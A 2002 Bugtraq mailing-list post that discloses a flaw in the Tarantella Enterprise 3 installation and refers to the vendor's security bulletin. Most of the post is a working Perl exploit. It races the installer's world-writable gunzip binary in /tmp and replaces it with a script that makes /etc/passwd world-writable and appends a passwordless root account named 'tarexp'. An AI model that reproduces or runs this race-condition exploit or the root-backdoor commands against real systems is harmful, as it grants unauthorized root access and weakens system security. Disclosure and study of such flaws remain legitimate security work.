[24972] in bugtraq
Exploit for Tarantella Enterprise 3 installation (BID 3966)
daemon@ATHENA.MIT.EDU (Larry W. Cashdollar)
Thu Apr 4 16:12:45 2002
Date: Wed, 3 Apr 2002 23:19:48 -0500 (EST)
From: "Larry W. Cashdollar" <lwc@vapid.dhs.org>
To: <bugtraq@securityfocus.com>
Cc: <vuldb@securityfocus.com>
Message-ID: <20020403231251.R15400-100000@vapid.dhs.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Tarantella addressed these issues in a security bulletin:
http://www.tarantella.com/security/bulletin-04.html
#!/usr/bin/perl -w
#Another Exploit for tarantella enterprise 3 installation.
#Larry Cashdollar lwc@vapid.dhs.org 2/08/2002
#Exploits gunzip$$ binary being created in /tmp with perm 777
#http://online.securityfocus.com/bid/3966
#Experimental ext3 kernel mods for preventing/researching race conditions.
#http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html
use strict;
`cat << -EOF- > root.sh
#!/bin/sh
chmod 777 /etc/passwd
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
-EOF-`;
my $OUT = '';
while(!$OUT) {
$OUT = `ps -ax |grep gunzip |grep -v grep`;
print "Found $OUT\n";
}
my @args = split(' ',$OUT);
# Do this with one copy operation. This will break installation of tarantella.
# should test for -w on /etc/passwd stop and su - tarexp.
while(1) {
`cp root.sh $args[4]`;
}
